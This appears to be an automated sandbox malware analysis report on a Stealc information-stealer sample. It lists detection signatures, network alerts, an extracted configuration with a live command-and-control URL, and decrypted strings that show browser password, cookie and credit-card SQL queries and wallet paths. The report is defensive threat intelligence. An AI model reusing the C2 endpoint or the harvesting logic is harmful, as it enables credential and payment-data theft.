Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6X4BIzTTBR.exe

Overview

General Information

Sample name:6X4BIzTTBR.exe
renamed because original name is a hash value
Original sample name:5a45cfe0b266362b482cace7205c2c32.exe
Analysis ID:1563391
MD5:5a45cfe0b266362b482cace7205c2c32
SHA1:29bdfb28ebeba5b07571898bf514e9f624606293
SHA256:a0e267be6b982f374175ffc83be37b3fcf351cbd1e9ee899d02fb7c722c55c7b
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 6X4BIzTTBR.exe (PID: 7356 cmdline: "C:\Users\user\Desktop\6X4BIzTTBR.exe" MD5: 5A45CFE0B266362B482CACE7205C2C32)
    • ED60.tmp.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Local\Temp\ED60.tmp.exe" MD5: A969307FDB2862755469583A5D9BEA48)
      • WerFault.exe (PID: 7896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7532 -s 1288 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://92.255.57.88/7bbacc20a3bd2eb5.php", "Botnet": "551488411"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1150:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000001.00000002.2250272597.0000000002D6C000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1410:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000001.00000003.1957434387.0000000002CB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        Click to see the 6 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.3.ED60.tmp.exe.2cb0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
          1.2.ED60.tmp.exe.2c70e67.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
            1.2.ED60.tmp.exe.2c70e67.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              1.3.ED60.tmp.exe.2cb0000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                1.2.ED60.tmp.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  Click to see the 1 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-26T22:47:29.434017+010020442431Malware Command and Control Activity Detected192.168.2.44973892.255.57.8880TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-26T22:47:10.220831+010028032742Potentially Bad Traffic192.168.2.449730172.67.179.207443TCP
                  2024-11-26T22:47:11.804571+010028032742Potentially Bad Traffic192.168.2.449731176.113.115.3780TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://92.255.57.88/7bbacc20a3bd2eb5.phpMAvira URL Cloud: Label: malware
                  Source: http://92.255.57.88Avira URL Cloud: Label: malware
                  Source: http://92.255.57.88/7bbacc20a3bd2eb5.phpKAvira URL Cloud: Label: malware
                  Source: http://92.255.57.88/7bbacc20a3bd2eb5.phpfAvira URL Cloud: Label: malware
                  Source: http://92.255.57.88/_Avira URL Cloud: Label: malware
                  Source: http://92.255.57.88/7bbacc20a3bd2eb5.phpbAvira URL Cloud: Label: malware
                  Source: http://92.255.57.88/System32Avira URL Cloud: Label: malware
                  Source: http://92.255.57.88/tAvira URL Cloud: Label: malware
                  Source: http://92.255.57.88/7bbacc20a3bd2eb5.phpAvira URL Cloud: Label: malware
                  Source: http://92.255.57.88/Avira URL Cloud: Label: malware
                  Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEHAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000001.00000003.1957434387.0000000002CB0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://92.255.57.88/7bbacc20a3bd2eb5.php", "Botnet": "551488411"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeReversingLabs: Detection: 34%
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeReversingLabs: Detection: 34%
                  Multi AV Scanner detection for submitted file
                  Source: 6X4BIzTTBR.exeReversingLabs: Detection: 34%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: 6X4BIzTTBR.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: INSERT_KEY_HERE
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: 26
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: 12
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: 20
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: 24
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetProcAddress
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: LoadLibraryA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: lstrcatA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: OpenEventA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CreateEventA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CloseHandle
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Sleep
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetUserDefaultLangID
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: VirtualAllocExNuma
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: VirtualFree
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetSystemInfo
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: VirtualAlloc
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: HeapAlloc
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetComputerNameA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: lstrcpyA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetProcessHeap
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetCurrentProcess
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: lstrlenA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: ExitProcess
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GlobalMemoryStatusEx
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetSystemTime
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SystemTimeToFileTime
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: advapi32.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: gdi32.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: user32.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: crypt32.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetUserNameA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CreateDCA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetDeviceCaps
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: ReleaseDC
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CryptStringToBinaryA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: sscanf
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: VMwareVMware
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: HAL9TH
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: JohnDoe
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: DISPLAY
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %hu/%hu/%hu
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: http://92.255.57.88
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: /7bbacc20a3bd2eb5.php
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: /7550b1c08332241a/
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: 551488411
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetEnvironmentVariableA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetFileAttributesA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: HeapFree
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetFileSize
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GlobalSize
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CreateToolhelp32Snapshot
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: IsWow64Process
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Process32Next
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetLocalTime
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: FreeLibrary
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetTimeZoneInformation
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetSystemPowerStatus
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetVolumeInformationA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetWindowsDirectoryA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Process32First
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetLocaleInfoA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetUserDefaultLocaleName
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetModuleFileNameA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: DeleteFileA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: FindNextFileA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: LocalFree
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: FindClose
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SetEnvironmentVariableA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: LocalAlloc
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetFileSizeEx
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: ReadFile
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SetFilePointer
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: WriteFile
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CreateFileA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: FindFirstFileA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CopyFileA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: VirtualProtect
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetLastError
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: lstrcpynA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: MultiByteToWideChar
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GlobalFree
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: WideCharToMultiByte
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GlobalAlloc
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: OpenProcess
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: TerminateProcess
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetCurrentProcessId
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: gdiplus.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: ole32.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: bcrypt.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: wininet.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: shlwapi.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: shell32.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: rstrtmgr.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CreateCompatibleBitmap
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SelectObject
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: BitBlt
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: DeleteObject
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CreateCompatibleDC
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GdipGetImageEncodersSize
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GdipGetImageEncoders
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GdiplusStartup
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GdiplusShutdown
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GdipSaveImageToStream
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GdipDisposeImage
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GdipFree
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetHGlobalFromStream
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CreateStreamOnHGlobal
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CoUninitialize
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CoInitialize
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CoCreateInstance
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: BCryptDecrypt
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: BCryptSetProperty
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: BCryptDestroyKey
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetWindowRect
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetDesktopWindow
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetDC
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CloseWindow
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: wsprintfA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: EnumDisplayDevicesA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetKeyboardLayoutList
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CharToOemW
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: wsprintfW
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: RegQueryValueExA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: RegEnumKeyExA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: RegOpenKeyExA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: RegCloseKey
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: RegEnumValueA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CryptBinaryToStringA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CryptUnprotectData
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SHGetFolderPathA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: ShellExecuteExA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: InternetOpenUrlA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: InternetConnectA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: InternetCloseHandle
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: HttpSendRequestA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: HttpOpenRequestA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: InternetReadFile
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: InternetCrackUrlA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: StrCmpCA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: StrStrA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: StrCmpCW
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: PathMatchSpecA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: GetModuleFileNameExA
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: RmStartSession
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: RmRegisterResources
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: RmGetList
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: RmEndSession
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: sqlite3_open
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: sqlite3_prepare_v2
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: sqlite3_step
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: sqlite3_column_text
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: sqlite3_finalize
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: sqlite3_close
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: sqlite3_column_bytes
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: sqlite3_column_blob
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: encrypted_key
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: PATH
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: NSS_Init
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: NSS_Shutdown
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: PK11_GetInternalKeySlot
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: PK11_FreeSlot
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: PK11_Authenticate
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: PK11SDR_Decrypt
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: C:\ProgramData\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: browser:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: profile:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: url:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: login:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: password:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Opera
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: OperaGX
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Network
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: cookies
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: .txt
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: TRUE
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: FALSE
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: autofill
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: history
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: cc
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: name:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: month:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: year:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: card:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Cookies
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Login Data
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Web Data
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: History
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: logins.json
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: formSubmitURL
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: usernameField
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: encryptedUsername
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: encryptedPassword
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: guid
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: cookies.sqlite
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: formhistory.sqlite
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: places.sqlite
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: plugins
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Local Extension Settings
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Sync Extension Settings
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: IndexedDB
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Opera Stable
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Opera GX Stable
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: CURRENT
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: chrome-extension_
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: _0.indexeddb.leveldb
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Local State
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: profiles.ini
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: chrome
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: opera
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: firefox
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: wallets
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %08lX%04lX%lu
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: ProductName
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: x32
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: x64
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: DisplayName
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: DisplayVersion
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Network Info:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - IP: IP?
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - Country: ISO?
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: System Summary:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - HWID:
